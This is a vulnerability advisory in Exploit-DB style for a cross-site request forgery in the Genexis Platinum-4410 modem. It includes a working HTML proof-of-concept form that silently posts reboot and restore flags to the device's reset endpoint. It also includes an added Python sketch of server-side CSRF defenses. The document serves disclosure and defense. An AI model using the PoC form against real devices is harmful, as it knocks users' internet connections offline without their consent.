Vendor: Platinum-4410
By: Mohammed Farhan
CVSS: 6.8 (MEDIUM)
CWE: 352 (Cross Site Request Forgery)
Product Name: Platinum-4410
Affected Version From: P4410-V2-1.28
Affected Version To: P4410-V2-1.28
Patch Exists: NO
Related CWE: N/A
CPE: genexis.co.in/product/ont/
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Windows 10
2020

Genexis Platinum-4410 P4410-V2-1.28 – Cross Site Request Forgery to Reboot

Login to the application and create an HTML file using the code provided. Open the HTML page in the browser and click on 'Submit Request'. This will cause the modem to reboot.

Mitigation:

Implement a strong authentication mechanism and validate all input data.
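
For the CWE-352 class reported here, a server-side gate on the state-changing handler can look like the sketch below: a same-origin check plus a session-bound token. This is an added example, not code from the advisory or the vendor; the function names, the csrf_token field and the sample requests are assumptions made for illustration.

```python
import hashlib
import hmac
import secrets
from urllib.parse import urlsplit

# Assumptions (not from the advisory): all names here and the csrf_token field.
DEVICE_ORIGIN = "http://192.168.1.1"  # address used in the PoC form
SERVER_KEY = secrets.token_bytes(32)  # per-boot secret, never sent to clients


def issue_csrf_token(session_id):
    """Session-bound token the device embeds as a hidden field in its own form."""
    return hmac.new(SERVER_KEY, session_id.encode(), hashlib.sha256).hexdigest()


def same_origin(headers):
    """True only if Origin (or, failing that, Referer) names the device itself."""
    source = headers.get("Origin") or headers.get("Referer")
    if not source:
        return False  # state-changing request with no provenance: reject
    parts = urlsplit(source)
    return f"{parts.scheme}://{parts.netloc}" == DEVICE_ORIGIN


def authorize_reset(method, headers, session_id, form):
    """Gate for POST /cgi-bin/mag-reset.asp; returns (status, reason)."""
    if method != "POST":
        return 405, "method not allowed"
    if not session_id:
        return 401, "not logged in"
    if not same_origin(headers):
        return 403, "cross-origin request"
    expected = issue_csrf_token(session_id).encode()
    supplied = form.get("csrf_token", "").encode()
    if not hmac.compare_digest(expected, supplied):
        return 403, "missing or invalid CSRF token"
    return 200, "ok"


# Constructed sample requests. The session cookie rides along in both cases.
SESSION = "constructed-session-id"
RESET_FIELDS = {"rebootflag": "1", "restoreFlag": "1", "isCUCSupport": "0"}
# Form submitted from a local HTML file: browsers send an opaque "null" origin.
FORGED = ("POST", {"Origin": "null"}, SESSION, dict(RESET_FIELDS))
# Form served by the device, carrying the token it issued for this session.
LEGIT = ("POST", {"Origin": DEVICE_ORIGIN}, SESSION,
         dict(RESET_FIELDS, csrf_token=issue_csrf_token(SESSION)))

if __name__ == "__main__":
    print(authorize_reset(*FORGED), authorize_reset(*LEGIT))
```

The forged request is refused even though the session is valid, because neither the origin nor the token can be supplied by a page the device did not serve.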

Exploit-DB raw data:

# Exploit Title: Genexis Platinum-4410 P4410-V2-1.28 - Cross Site Request Forgery to Reboot
# Date: 10/28/2020
# Exploit Author: Mohammed Farhan
# Vendor Homepage: https://genexis.co.in/product/ont/
# Version: Platinum-4410 Software version - P4410-V2-1.28
# Tested on: Windows 10
# Author Contact: https://twitter.com/farhankn

Vulnerability Details
======================
Login to the application
Create an HTML file using the below mentioned code

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://192.168.1.1/cgi-bin/mag-reset.asp" method="POST">
      <input type="hidden" name="rebootflag" value="1" />
      <input type="hidden" name="restoreFlag" value="1" />
      <input type="hidden" name="isCUCSupport" value="0" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Open the HTML page in the browser and Click on "Submit Request"
Note that modem reboots after the same